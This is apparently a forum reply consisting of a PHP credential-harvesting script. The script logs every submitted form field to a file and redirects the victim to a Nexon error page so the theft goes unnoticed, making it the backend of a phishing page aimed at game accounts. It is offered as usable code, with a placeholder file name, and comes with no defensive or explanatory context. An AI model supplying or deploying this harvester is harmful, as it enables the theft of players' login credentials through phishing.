Code:
<?php
header("location: http://www.nexon.net/errorPage.html");
$handle = fopen("filenamehere. :D", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
You mean that?